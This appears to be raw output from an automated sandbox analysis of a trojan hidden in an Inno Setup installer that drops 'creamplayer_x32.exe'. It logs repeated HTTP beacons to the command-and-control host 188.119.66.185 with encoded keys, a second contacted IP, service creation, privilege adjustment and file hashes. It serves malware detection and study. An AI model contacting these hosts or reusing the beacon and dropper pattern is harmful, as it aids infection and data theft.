                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D42B95 WSASetLastError,WSARecv,WSASetLastError,select | 5_2_02D42B95
                    Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda322c18d43188 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 188.119.66.185
                    Source: bzX2pV3Ybw.tmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.dr | String found in binary or memory: http://www.innosetup.com/
                    Source: bzX2pV3Ybw.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: bzX2pV3Ybw.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1353293615.0000000002278000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1353116104.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.dr | String found in binary or memory: http://www.remobjects.com/ps
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1353293615.0000000002278000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1353116104.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.dr | String found in binary or memory: http://www.remobjects.com/psU
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/-
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/3
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/4
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/:
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/C
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ECDB288DE53FB0A3EE059080EF4409BC0D96FBCi
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/J
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/Q
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/V
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/allowedCert_OS_1
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/en-GB
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/g
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/mCertificates
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/n
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ography
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/rosoft
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/u
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1352721583.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1352806549.0000000002271000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000002.2614892365.0000000002271000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000003.1355047520.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000003.1355124435.0000000002128000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614915917.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2615261275.0000000002128000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49864
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49984
                    Source: unknown | Network traffic detected: HTTP traffic on port 49898 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49984 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49939 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49958 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49939
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49858
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49978
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49898
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49931
                    Source: unknown | Network traffic detected: HTTP traffic on port 49925 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49972
                    Source: unknown | Network traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknown | Network traffic detected: HTTP traffic on port 49919 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49946 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49858 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 50000 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49925
                    Source: unknown | Network traffic detected: HTTP traffic on port 49978 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49886 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49999 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49966
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49886
                    Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49880
                    Source: unknown | Network traffic detected: HTTP traffic on port 49972 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49966 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49873 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 50001 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49919
                    Source: unknown | Network traffic detected: HTTP traffic on port 49904 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49958
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49913
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49999
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49910
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49952
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49873
                    Source: unknown | Network traffic detected: HTTP traffic on port 49864 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49952 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49990
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50001
                    Source: unknown | Network traffic detected: HTTP traffic on port 49931 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50000
                    Source: unknown | Network traffic detected: HTTP traffic on port 49910 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50002
                    Source: unknown | Network traffic detected: HTTP traffic on port 50002 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49913 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49880 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49904
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49946
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.9:49844 version: TLS 1.2
                    Source: is-FFG28.tmp.2.dr | Binary or memory string: DirectDrawCreateExmemstr_ee9eaafe-4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0042F520 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00423B84 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004125D8 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00478AC0 NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0042E934 CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0048DF54
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_00401000
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_00406707
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609660FA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6092114F
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096923E
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6093323D
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095C314
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60950312
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094D33B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6093B368
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096748C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6093F42E
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60954470
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609615FA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609606A8
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60932654
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60955665
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6092F74D
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60964807
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60937929
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60936B27
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60954CF6
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60950C6B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60966DF1
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60963D35
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60909E9C
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60951E86
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60912E0B
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60954FF8
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D5BAED
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D62A70
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D5D31F
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D570B0
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D4E06F
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D6266D
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D5BF05
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D5873A
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D5B5F9
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D60DA4
                    Source: Joe Sandbox View | Dropped File: C:\ProgramData\SmartImageDrive\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: String function: 02D62A00 appears 136 times
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: String function: 02D57750 appears 32 times
                    Source: bzX2pV3Ybw.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: bzX2pV3Ybw.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: bzX2pV3Ybw.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-9AR6U.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-9AR6U.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-9AR6U.tmp.2.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.5.dr | Static PE information: Number of sections : 19 > 10
                    Source: is-S3M63.tmp.2.dr | Static PE information: Number of sections : 19 > 10
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1353293615.0000000002278000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs bzX2pV3Ybw.exe
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1353116104.00000000025A0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs bzX2pV3Ybw.exe
                    Source: bzX2pV3Ybw.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engine | Classification label: mal96.troj.evad.winEXE@10/30@0/2
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D4F8C0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_00401E0F CloseServiceHandle,CreateServiceA,CloseServiceHandle
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0046E0E4 GetVersion,CoCreateInstance
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_00401724 StartServiceCtrlDispatcherA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_00401724 StartServiceCtrlDispatcherA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_004017FE StartServiceCtrlDispatcherA
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_00401FB6 ExitProcess,StartServiceCtrlDispatcherA
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\Programs
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | File created: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp
                    Source: Yara match | File source: 5.0.creamplayer_x32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000002.00000002.2615859333.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000000.1369381246.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
